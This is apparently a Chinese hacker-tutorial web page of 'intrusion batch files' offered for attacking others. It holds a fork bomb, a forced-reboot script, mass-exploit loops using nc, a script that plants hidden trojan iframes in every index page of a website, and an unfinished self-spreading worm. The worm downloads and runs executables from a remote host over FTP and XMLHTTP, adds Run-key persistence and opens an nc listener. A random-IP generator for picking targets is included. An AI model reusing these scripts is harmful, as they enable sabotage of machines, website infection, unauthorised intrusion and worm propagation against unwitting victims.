建站极客  
                        网络安全                          黑客教程                          正文 
                     
                 
                
                    各种入侵批处理                 
                
                    所属分类:
                        网络安全  / 黑客教程                      
                    阅读数:
                        120 
                    
                        
                                 
                             收藏 0
                                 
                             赞 0
                                 
                             分享 
                    
                 
                
                    第一个:让别人内存OVER(逼他重启)
 @echo off
 start cmd
 %0 
 
 就这3行了
 
 
 第二个:让对方重启指定次数(害人专用)
 @echo off
 if not exist c:\1.txt echo. >c:\1.txt & goto err1
 if not exist c:\2.txt echo. >c:\2.txt & goto err1
 if not exist c:\3.txt echo. >c:\3.txt & goto err1
 if not exist c:\4.txt echo. >c:\4.txt & goto err1
 if not exist c:\5.txt echo. >c:\5.txt & goto err1
 goto err2
 :err1
 shutdown -s -t 0
 :err2
 上面可以让对方电脑重启5次后不在重启
 
 
 第三个:自动踢人(3389肉机保护自己专用)
 @echo off
 logoff 1
 del log.bat
 logoff后面的1改成自己登陆的ID号,用query user查看
 
 
 第四个: 批量自动溢出
 @for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
 先自己用NC监听端口,多开几个,然后指行,就自动溢出了
 
  
 
 第五个:自动挂马改主页
 @echo off
 cls
 rem 直接打批处理名字就有帮助
 title 批量挂马,改首页(伤脑筋 QQ:447228437).
 color A
 set pan=%1
 set ye=%2
 set dai=%3
 if "%pan%"=="" goto e1
 if "%ye%"=="" goto e1
 if "趇%"=="" goto e1
 if "趇%"=="htm.txt" goto u1
 forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://趇%" width="0" height="0" frameborder="0"^> >>@path"
 echo.
 echo     代码全部插入完毕!!!!
 echo.
 pause
 goto e1
 :u1
 echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.
 echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl c取消操作.
 pause
 forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
 echo.
 echo   首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉.
 echo.
 pause
 :e1
 echo.
 echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下
 echo 用法:snj ^<搜索盘符^> ^<文件名^> ^<网马地址^> 
 echo 例子:snj d:\ index.asp www.muma.com/mm.htm
 echo 批处理将自动添加^<iframe^>标记
 echo.
 echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.
 echo 然后将要更改的代码加COPY到里面保存.然后将命令的^<网马地址^>项输入为htm.txt即可.
 echo 例子:snj d:\ index.asp htm.txt
 echo. 
 echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.
 echo.
 echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用!
 echo.
 
  
 
 第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒
 本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.
 这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完
 del c:\42.exe
 del c:\nc.exe
 del c:\ip.exe
 echo dim wsh > %systemroot%\help\test.vbs
 echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
 echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
 echo dim wsh > %systemroot%\help\test2.vbs
 echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs
 echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs
 echo open 10.0.0.5 > %systemroot%\help\ftp.txt
 echo open myyes >> %systemroot%\help\ftp.txt
 echo 1 >> %systemroot%\help\ftp.txt
 echo binary >> %systemroot%\help\ftp.txt
 echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
 echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
 echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
 echo bye >> %systemroot%\help\ftp.txt
 echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt
 echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
 echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
 echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg
 echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
 echo "SKYNET Personal FireWall"="F:\\系统安全工具\\FireWall\\PFW.exe" >> %systemroot%\help\1.reg
 echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg
 
 if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
 regedit -s %systemroot%\help\1.reg
 ftp -s:%systemroot%\help\ftp.txt
 move c:\nc.exe %systemroot%\help\ /y
 move c:\42.exe %systemroot%\help\ /y
 move c:\ip.exe %systemroot%\help\ /y
 %systemroot%\help\test.vbs
 rem for /f %%i in (result1.txt) do set a=%%i
 rem for /f %%j in (result.txt) do 42 %a% %%j 810
 准备:
 1:找一个反向连接的溢出攻击程序,如ms06040漏洞
 2:找呀一个免费FTP空间,最好是送域名的
 3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.
 思路:
 用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 < 输入符号
 输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.
 
 把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下
 因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下
 echo dim wsh > %systemroot%\help\test.vbs
 echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
 echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
 
 生成随机IP工具的VB代码
 Private Sub Form_Load()
 Dim fso As New FileSystemObject
 Dim a, b, c, d   As Integer
 Dim ph, e As String
 ph = App.Path & "\" & "ip.txt"
 Randomize
 a = Int(253 * Rnd   1)
 b = Int(253 * Rnd   1)
 c = Int(240 * Rnd   1)
 Open ph For Output As #1
 For i = c To c   7
    For j = 1 To 254
      e = a & "." & b & "." & i & "." & j
      Print #1, e
      DoEvents
    Next j
 Next i
 Close #1
 Unload Me
 End Sub 
                                     
             
            
                
                CSRF的攻击方式详解 黑客必备知识 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
抓取管理员hash值(哈希)的另类方法 哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
网站安全教程 绕过D盾进行注入的方法(图文教程) D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
局域网安全教程 HSRP攻击和防范的方法介绍(图文教程) 热备份路由器协议(HSRP)的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
SQL通用防注入系统asp版漏洞 今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
                 查看更多